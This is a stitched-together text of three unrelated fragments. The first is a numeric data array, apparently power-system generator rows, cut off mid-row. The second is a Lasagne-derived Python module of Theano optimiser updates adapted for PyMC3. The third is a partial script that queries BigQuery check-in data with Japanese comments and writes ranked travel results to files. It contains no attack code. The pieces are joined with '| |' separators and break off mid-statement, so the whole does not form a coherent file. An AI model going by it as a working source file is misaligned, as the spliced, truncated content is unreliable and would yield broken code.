[1117, 39.481254, 0, 9999, -9999, 1.0, 100, 1, 90.792541, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1118, 5.937002, 0, 9999, -9999, 1.0, 100, 1, 8.725012, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1119, 18.54768, 0, 9999, -9999, 1.0, 100, 1, 43.254023, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1120, 1.836916, 0, 9999, -9999, 1.0, 100, 1, 2.416001, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1121, 0.366174, 0, 9999, -9999, 1.0, 100, 1, 0.540589, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1122, 1.073929, 0, 9999, -9999, 1.0, 100, 1, 1.462883, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1123, 0.746002, 0, 9999, -9999, 1.0, 100, 1, 1.464336, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1124, 0.82072, 0, 9999, -9999, 1.0, 100, 1, 1.288283, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1125, 19.968941, 0, 9999, -9999, 1.0, 100, 1, 25.818899, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1126, 22.936377, 0, 9999, -9999, 1.0, 100, 1, 29.154893, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1127, 75.13808, 0, 9999, -9999, 1.0, 100, 1, 105.296621, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1128, 2.603305, 0, 9999, -9999, 1.0, 100, 1, 3.06139, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1129, 3.989518, 0, 9999, -9999, 1.0, 100, 1, 4.738747, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1130, 0.866541, 0, 9999, -9999, 1.0, 100, 1, 1.025754, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1131, 2.439245, 0, 9999, -9999, 1.0, 100, 1, 2.897078, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1132, 0.30391, 0, 9999, -9999, 1.0, 100, 1, 0.359497, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1133, 0.487427, 0, 9999, -9999, 1.0, 100, 1, 0.719597, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1134, 0.344405, 0, 9999, -9999, 1.0, 100, 1, 0.508453, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1135, 5.771651, 0, 9999, -9999, 1.0, 100, 1, 8.117819, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1136, 0.268789, 0, 9999, -9999, 1.0, 100, 1, 0.4027, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1137, 2.00207, 0, 9999, -9999, 1.0, 100, 1, 3.669012, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1138, 0.797752, 0, 9999, -9999, 1.0, 100, 1, 1.254278, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1139, 10.163676, 0, 9999, -9999, 1.0, 100, 1, 19.822769, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1140, 11.999834, 0, 9999, -9999, 1.0, 100, 1, 28.389457, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1141, 65.218706, 0, 9999, -9999, 1.0, 100, 1, 119.46456, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1142, 0.848405, 0, 9999, -9999, 1.0, 100, 1, 1.215733, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1143, 17.658705, 0, 9999, -9999, 1.0, 100, 1, 25.239356, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1144, 29.127723, 0, 9999, -9999, 1.0, 100, 1, 52.527382, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1146, 0.583423, 0, 9999, -9999, 1.0, 100, 1, 0.861317, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1147, 24.223472, 0, 9999, -9999, 1.0, 100, 1, 45.703707, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1148, 15.214504, 0, 9999, -9999, 1.0, 100, 1, 17.645529, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1149, 6.710653, 0, 9999, -9999, 1.0, 100, 1, 8.556784, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1150, 2.736041, 0, 9999, -9999, 1.0, 100, 1, 3.62256, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1151, 11.63465, 0, 9999, -9999, 1.0, 100, 1, 13.036113, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1152, 0.096385, 0, 9999, -9999, 1.0, 100, 1, 0.116518, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1153, 0.042769, 0, 9999, -9999, 1.0, 100, 1, 0.068788, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1154, 0.099868, 0, 9999, -9999, 1.0, 100, 1, 0.160625, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1155, 0.536079, 0, 9999, -9999, 1.0, 100, 1, 0.609451, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1156, 8.528687, 0, 9999, -9999, 1.0, 100, 1, 16.022334, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1157, 3.880705, 0, 9999, -9999, 1.0, 100, 1, 4.354147, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1158, 0.641152, 0, 9999, -9999, 1.0, 100, 1, 1.04304, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1159, 7.626711, 0, 9999, -9999, 1.0, 100, 1, 13.498087, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1160, 172.892569, 0, 9999, -9999, 1.0, 100, 1, 238.377761, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1161, 5.783428, 0, 9999, -9999, 1.0, 100, 1, 25.263391, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1162, 346.481068, 0, 9999, -9999, 1.0, 100, 1, 502.409178, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1163, 208.804718, 0, 9999, -9999, 1.0, 100, 1, 330.03194, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1164, 225.831056, 0, 9999, -9999, 1.0, 100, 1, 285.625412, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1165, 40.10023, 0, 9999, -9999, 1.0, 100, 1, 57.188579, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1166, 61.73277, 0, 9999, -9999, 1.0, 100, 1, 83.277163, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1167, 3.105793, 0, 9999, -9999, 1.0, 100, 1, 5.05378, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1168, 0.937339, 0, 9999, -9999, 1.0, 100, 1, 1.345774, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1169, 2.269192, 0, 9999, -9999, 1.0, 100, 1, 2.721845, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1170, 0.163597, 0, 9999, -9999, 1.0, 100, 1, 0.26599, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1171, 2.671755, 0, 9999, -9999, 1.0, 100, 1, 9.029885, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1172, 0.551228, 0, 9999, -9999, 1.0, 100, 1, 3.584043, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1173, 179.321558, 0, 9999, -9999, 1.0, 100, 1, 254.253327, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1174, 0.774417, 0, 9999, -9999, 1.0, 100, 1, 1.260082, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1175, 0.654572, 0, 9999, -9999, 1.0, 100, 1, 0.855454, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1176, 0.203207, 0, 9999, -9999, 1.0, 100, 1, 0.23222, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1177, 21.987815, 0, 9999, -9999, 1.0, 100, 1, 27.87401, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1178, 2.428114, 0, 9999, -9999, 1.0, 100, 1, 3.167999, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1179, 1.02202, 0, 9999, -9999, 1.0, 100, 1, 1.306293, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1180, 0.423394, 0, 9999, -9999, 1.0, 100, 1, 0.688545, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1181, 72.346644, 0, 9999, -9999, 1.0, 100, 1, 85.739557, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1182, 90.357464, 0, 9999, -9999, 1.0, 100, 1, 99.319579, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1183, 22.605841, 0, 9999, -9999, 1.0, 100, 1, 38.222575, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1184, 3.03572, 0, 9999, -9999, 1.0, 100, 1, 4.219005, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1185, 5.789482, 0, 9999, -9999, 1.0, 100, 1, 11.343971, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1186, 30.365724, 0, 9999, -9999, 1.0, 100, 1, 38.916368, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1187, 7.822855, 0, 9999, -9999, 1.0, 100, 1, 9.814574, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1188, 120.950251, 0, 9999, -9999, 1.0, 100, 1, 179.712741, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1190, 20.412862, 0, 9999, -9999, 1.0, 100, 1, 220.533673, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1191, 11.541946, 0, 9999, -9999, 1.0, 100, 1, 73.079413, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1192, 0.641801, 0, 9999, -9999, 1.0, 100, 1, 21.454569, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1193, 0.069317, 0, 9999, -9999, 1.0, 100, 1, 2.399953, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1194, 0.235549, 0, 9999, -9999, 1.0, 100, 1, 8.986036, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1195, 0.034093, 0, 9999, -9999, 1.0, 100, 1, 0.202359, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1196, 126.926131, 0, 9999, -9999, 1.0, 100, 1, 160.697956, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1197, 66.086696, 0, 9999, -9999, 1.0, 100, 1, 90.592266, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1198, 29.455528, 0, 9999, -9999, 1.0, 100, 1, 39.819157, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1199, 154.934818, 0, 9999, -9999, 1.0, 100, 1, 201.421956, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1200, 49.907599, 0, 9999, -9999, 1.0, 100, 1, 56.012408, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1201, 0.9656, 0, 9999, -9999, 1.0, 100, 1, 25.166667, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1202, 1.252694, 0, 9999, -9999, 1.0, 100, 1, 49.89238, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1203, 7.239319, 0, 9999, -9999, 1.0, 100, 1, 182.623256, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1204, 32.933382, 0, 9999, -9999, 1.0, 100, 1, 47.541821, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1205, 0.060996, 0, 9999, -9999, 1.0, 100, 1, 0.548843, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1206, 0.11359, 0, 9999, -9999, 1.0, 100, 1, 3.806894, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1207, 0.103269, 0, 9999, -9999, 1.0, 100, 1, 3.575453, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1208, 0.242227, 0, 9999, -9999, 1.0, 100, 1, 2.242031, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1209, 0.011906, 0, 9999, -9999, 1.0, 100, 1, 1.268261, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1210, 1.489975, 0, 9999, -9999, 1.0, 100, 1, 9.02599, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1211, 3.71803, 0, 9999, -9999, 1.0, 100, 1, 18.005229, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1212, 16.071779, 0, 9999, -9999, 1.0, 100, 1, 91.171888, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1213, 14.003597, 0, 9999, -9999, 1.0, 100, 1, 57.342704, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1214, 0.269686, 0, 9999, -9999, 1.0, 100, 1, 4.505907, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1215, 0.1434, 0, 9999, -9999, 1.0, 100, 1, 2.252965, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1216, 6.091928, 0, 9999, -9999, 1.0, 100, 1, 67.754469, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1217, 4.427853, 0, 9999, -9999, 1.0, 100, 1, 35.871617, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1218, 0.106354, 0, 9999, -9999, 1.0, 100, 1, 0.980482, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1219, 9.771661, 0, 9999, -9999, 1.0, 100, 1, 12.33953, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1220, 18.526097, 0, 9999, -9999, 1.0, 100, 1, 30.597849, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1221, 30.718044, 0, 9999, -9999, 1.0, 100, 1, 593.230436, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1222, 48.330044, 0, 9999, -9999, 1.0, 100, 1, 211.057769, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1223, 0.533002, 0, 9999, -9999, 1.0, 100, 1, 3.806101, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1224, 0.867056, 0, 9999, -9999, 1.0, 100, 1, 160.523778, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1225, 13.153778, 0, 9999, -9999, 1.0, 100, 1, 34.931481, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1226, 2.047114, 0, 9999, -9999, 1.0, 100, 1, 3.982858, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1227, 7.083334, 0, 9999, -9999, 1.0, 100, 1, 17.482807, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1228, 0.850314, 0, 9999, -9999, 1.0, 100, 1, 3.021367, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1229, 40.481646, 0, 9999, -9999, 1.0, 100, 1, 51.244222, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1230, 0.101941, 0, 9999, -9999, 1.0, 100, 1, 1.681276, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1231, 5.614499, 0, 9999, -9999, 1.0, 100, 1, 33.55478, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1232, 9.04332, 0, 9999, -9999, 1.0, 100, 1, 75.075088, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1233, 397.200611, 0, 9999, -9999, 1.0, 100, 1, 575.36828, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1235, 7.243964, 0, 9999, -9999, 1.0, 100, 1, 9.03734, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1236, 65.758234, 0, 9999, -9999, 1.0, 100, 1, 82.225035, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1237, 4.873307, 0, 9999, -9999, 1.0, 100, 1, 14.605409, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1238, 24.676711, 0, 9999, -9999, 1.0, 100, 1, 188.691049, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1239, 1.69401, 0, 9999, -9999, 1.0, 100, 1, 2.267706, 0.0, 0, 0, 0, 0, 0, 0, 0, | |
# Taken from the Lasagne project: http://lasagne.readthedocs.io/en/latest/
# License:
# The MIT License (MIT)
# Copyright (c) 2014-2015 Lasagne contributors
# Lasagne uses a shared copyright model: each contributor holds copyright over
# their contributions to Lasagne. The project versioning records all such
# contribution and copyright details.
# By contributing to the Lasagne repository through pull-request, comment,
# or otherwise, the contributor releases their content to the license and
# copyright terms herein.
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
"""
Functions to generate Theano update dictionaries for training.
The update functions implement different methods to control the learning
rate for use with stochastic gradient descent.
Update functions take a loss expression or a list of gradient expressions and
a list of parameters as input and return an ordered dictionary of updates:
.. autosummary::
:nosignatures:
sgd
momentum
nesterov_momentum
adagrad
rmsprop
adadelta
adam
adamax
Two functions can be used to further modify the updates to include momentum:
.. autosummary::
:nosignatures:
apply_momentum
apply_nesterov_momentum
Finally, we provide two helper functions to constrain the norm of tensors:
.. autosummary::
:nosignatures:
norm_constraint
total_norm_constraint
:func:`norm_constraint()` can be used to constrain the norm of parameters
(as an alternative to weight decay), or for a form of gradient clipping.
:func:`total_norm_constraint()` constrain the total norm of a list of tensors.
This is often used when training recurrent neural networks.
Examples
--------
>>> import lasagne
>>> import theano.tensor as T
>>> import theano
>>> from lasagne.nonlinearities import softmax
>>> from lasagne.layers import InputLayer, DenseLayer, get_output
>>> from lasagne.updates import sgd, apply_momentum
>>> l_in = InputLayer((100, 20))
>>> l1 = DenseLayer(l_in, num_units=3, nonlinearity=softmax)
>>> x = tt.matrix('x') # shp: num_batch x num_features
>>> y = tt.ivector('y') # shp: num_batch
>>> l_out = get_output(l1, x)
>>> params = lasagne.layers.get_all_params(l1)
>>> loss = tt.mean(tt.nnet.categorical_crossentropy(l_out, y))
>>> updates_sgd = sgd(loss, params, learning_rate=0.0001)
>>> updates = apply_momentum(updates_sgd, params, momentum=0.9)
>>> train_function = theano.function([x, y], updates=updates)
Notes
-----
Taken from the Lasagne project: http://lasagne.readthedocs.io/en/latest/
"""
from functools import partial
from collections import OrderedDict
import numpy as np
import theano
import theano.tensor as tt
import pymc3 as pm
__all__ = [
"sgd",
"apply_momentum",
"momentum",
"apply_nesterov_momentum",
"nesterov_momentum",
"adagrad",
"adagrad_window",
"rmsprop",
"adadelta",
"adam",
"adamax",
"norm_constraint",
"total_norm_constraint",
]
def get_or_compute_grads(loss_or_grads, params):
"""Helper function returning a list of gradients
Parameters
----------
loss_or_grads : symbolic expression or list of expressions
A scalar loss expression, or a list of gradient expressions
params : list of shared variables
The variables to return the gradients for
Returns
-------
list of expressions
If `loss_or_grads` is a list, it is assumed to be a list of
gradients and returned as is, unless it does not match the length
of `params`, in which case a `ValueError` is raised.
Otherwise, `loss_or_grads` is assumed to be a cost expression and
the function returns `theano.grad(loss_or_grads, params)`.
Raises
------
ValueError
If `loss_or_grads` is a list of a different length than `params`, or if
any element of `params` is not a shared variable (while we could still
compute its gradient, we can never update it and want to fail early).
"""
if any(not isinstance(p, theano.compile.SharedVariable) for p in params):
raise ValueError("params must contain shared variables only. If it "
"contains arbitrary parameter expressions, then "
"lasagne.utils.collect_shared_vars() may help you.")
if isinstance(loss_or_grads, list):
if not len(loss_or_grads) == len(params):
raise ValueError("Got %d gradient expressions for %d parameters" %
(len(loss_or_grads), len(params)))
return loss_or_grads
else:
return theano.grad(loss_or_grads, params)
def _get_call_kwargs(_locals_):
_locals_ = _locals_.copy()
_locals_.pop('loss_or_grads')
_locals_.pop('params')
return _locals_
def sgd(loss_or_grads=None, params=None, learning_rate=1e-3):
"""Stochastic Gradient Descent (SGD) updates
Generates update expressions of the form:
* ``param := param - learning_rate * gradient``
Parameters
----------
loss_or_grads : symbolic expression or list of expressions
A scalar loss expression, or a list of gradient expressions
params : list of shared variables
The variables to generate update expressions for
learning_rate : float or symbolic scalar
The learning rate controlling the size of update steps
Returns
-------
OrderedDict
A dictionary mapping each parameter to its update expression
Notes
-----
Optimizer can be called without both loss_or_grads and params
in that case partial function is returned
Examples
--------
>>> a = theano.shared(1.)
>>> b = a*2
>>> updates = sgd(b, [a], learning_rate=.01)
>>> isinstance(updates, dict)
True
>>> optimizer = sgd(learning_rate=.01)
>>> callable(optimizer)
True
>>> updates = optimizer(b, [a])
>>> isinstance(updates, dict)
True
"""
if loss_or_grads is None and params is None:
return partial(sgd, **_get_call_kwargs(locals()))
elif loss_or_grads is None or params is None:
raise ValueError(
'Please provide both `loss_or_grads` and `params` to get updates')
grads = get_or_compute_grads(loss_or_grads, params)
updates = OrderedDict()
for param, grad in zip(params, grads):
updates[param] = param - learning_rate * grad
return updates
def apply_momentum(updates, params=None, momentum=0.9):
"""Returns a modified update dictionary including momentum
Generates update expressions of the form:
* ``velocity := momentum * velocity + updates[param] - param``
* ``param := param + velocity``
Parameters
----------
updates : OrderedDict
A dictionary mapping parameters to update expressions
params : iterable of shared variables, optional
The variables to apply momentum to. If omitted, will apply
momentum to all `updates.keys()`.
momentum : float or symbolic scalar, optional
The amount of momentum to apply. Higher momentum results in
smoothing over more update steps. Defaults to 0.9.
Returns
-------
OrderedDict
A copy of `updates` with momentum updates for all `params`.
Notes
-----
Higher momentum also results in larger update steps. To counter that,
you can optionally scale your learning rate by `1 - momentum`.
See Also
--------
momentum : Shortcut applying momentum to SGD updates
"""
if params is None:
params = updates.keys()
updates = OrderedDict(updates)
for param in params:
value = param.get_value(borrow=True)
velocity = theano.shared(np.zeros(value.shape, dtype=value.dtype),
broadcastable=param.broadcastable)
x = momentum * velocity + updates[param]
updates[velocity] = x - param
updates[param] = x
return updates
def momentum(loss_or_grads=None, params=None,
learning_rate=1e-3, momentum=0.9):
"""Stochastic Gradient Descent (SGD) updates with momentum
Generates update expressions of the form:
* ``velocity := momentum * velocity - learning_rate * gradient``
* ``param := param + velocity``
Parameters
----------
loss_or_grads : symbolic expression or list of expressions
A scalar loss expression, or a list of gradient expressions
params : list of shared variables
The variables to generate update expressions for
learning_rate : float or symbolic scalar
The learning rate controlling the size of update steps
momentum : float or symbolic scalar, optional
The amount of momentum to apply. Higher momentum results in
smoothing over more update steps. Defaults to 0.9.
Returns
-------
OrderedDict
A dictionary mapping each parameter to its update expression
Notes
-----
Higher momentum also results in larger update steps. To counter that,
you can optionally scale your learning rate by `1 - momentum`.
Optimizer can be called without both loss_or_grads and params
in that case partial function is returned
See Also
--------
apply_momentum : Generic function applying momentum to updates
nesterov_momentum : Nesterov's variant of SGD with momentum
Examples
--------
>>> a = theano.shared(1.)
>>> b = a*2
>>> updates = momentum(b, [a], learning_rate=.01)
>>> isinstance(updates, dict)
True
>>> optimizer = momentum(learning_rate=.01)
>>> callable(optimizer)
True
>>> updates = optimizer(b, [a])
>>> isinstance(updates, dict)
True
"""
if loss_or_grads is None and params is None:
return partial(pm.updates.momentum, **_get_call_kwargs(locals()))
elif loss_or_grads is None or params is None:
raise ValueError(
'Please provide both `loss_or_grads` and `params` to get updates')
updates = sgd(loss_or_grads, params, learning_rate)
return apply_momentum(updates, momentum=momentum)
def apply_nesterov_momentum(updates, | |
" + country + "\n")
f3.write("Input Interested Category from User: ")
for key , value in original_input.items():
f3.write(key + ":" +str(value) +",")
f3.write("\nMatched Interested Category: \n")
for key , value in all_interest.items():
f3.write(key + ":" +str(value) +",")
f3.write("\n \n")
f3.write("Top Rankings (Similarity,User Name): " + str(rankings)+ "\n \n")
print(len(rankings))
for u in rankings:
# queryの実行
print("\nUser:" + u[1])
query = 'SELECT VENUE_ID, LATITUDE, LONGITUDE, COUNTRY, HOME, CATEGORY, DATE FROM dataset_TIST2015.Checkins_POIs_Travel_marked WHERE USER_ID = ' + u[1] + ' and TRAVEL = 1 and COUNTRY = \'' + country + '\''
#print(query)
try:
job_id, results = client.query(query, timeout=60)
except BigQueryTimeoutException as e:
print('Exception')
# 日付のフォーマットを変換
for q in results:
q['DATE'] = q['DATE'][4:]
Mon = q['DATE'][:3]
q['DATE'] = q['DATE'][4:]
if Mon == "Jan":
q['DATE'] = "01" + q['DATE']
if Mon == "Feb":
q['DATE'] = "02" + q['DATE']
if Mon == "Mar":
q['DATE'] = "03" + q['DATE']
if Mon == "Apr":
q['DATE'] = "04" + q['DATE']
if Mon == "May":
q['DATE'] = "05" + q['DATE']
if Mon == "Jun":
q['DATE'] = "06" + q['DATE']
if Mon == "Jul":
q['DATE'] = "07" + q['DATE']
if Mon == "Aug":
q['DATE'] = "08" + q['DATE']
if Mon == "Sep":
q['DATE'] = "09" + q['DATE']
if Mon == "Oct":
q['DATE'] = "10" + q['DATE']
if Mon == "Nov":
q['DATE'] = "11" + q['DATE']
if Mon == "Dec":
q['DATE'] = "12" + q['DATE']
YEAR = q['DATE'][len(q['DATE'])-4:len(q['DATE'])]
q['DATE'] = YEAR + q['DATE'][:len(q['DATE'])-4]
# 結果の表示
results.sort(key=lambda x: x['DATE'])
total_weight = 0
time_counter = 0
previous_venue = "" # Version21で追加
previous_date = "" # Version21で追加
# 入力される Country Nameが JPの時だけ VENUE_NAMEで出力するように対応
location_name_dictionary = {}
if (country == "JP"):
location_name_dictionary = location_name = get_venue_names_from_venue_ids([q['VENUE_ID'] for q in results])
location_name = ""
previous_venue = "0"
for q in results:
if q['VENUE_ID'] in location_name_dictionary:
location_name = location_name_dictionary[q['VENUE_ID']]
else:
location_name = q['VENUE_ID']
counter = 0
for key_category , weight in all_interest.items():
if (key_category == q['CATEGORY']):
counter = weight
print(q['DATE'] + ', ' + q['CATEGORY'] + ', ' + location_name + ", Weight:" + str(counter))
# print(q['DATE'] + ',' + q['CATEGORY'] + ',' + str(q['LONGITUDE']) + ',' + str(q['LATITUDE']) + ',' + q['VENUE_ID'])
# Output1へ書き込み:主観的評価用(岡部さん用):ここから
f = open("output_result " + timestamp + ".txt", "a" ,encoding='utf-8')
# f = open("output_result.txt", "a" ,encoding='utf-8')
writing_information =(q['DATE'] + ', ' + q['CATEGORY'] + ', ' + location_name + ", Weight:" + str(counter) + ", Similarity:" + str("{0:.4f}".format(u[0])))
# writing_information =(q['DATE'] + ',' + q['CATEGORY'] + ',' + str(q['LONGITUDE']) + ',' + str(q['LATITUDE']) + ',' + get_venue_name_from_venue_id(q['VENUE_ID']) + ",weight:" + str(counter))
f.write(("user:" + u[1]) + ', ')
f.write(writing_information+"\n")
# Output1へ書き込み:ここまで
# Output2へ書き込み:客観的評価用(パッタラ用):ここから
counter = 0
# print(q['VENUE_ID'])
if (previous_venue != q['VENUE_ID'] and previous_date != q['DATE']):
for key_category , weight in all_interest.items():
if (key_category == q['CATEGORY']):
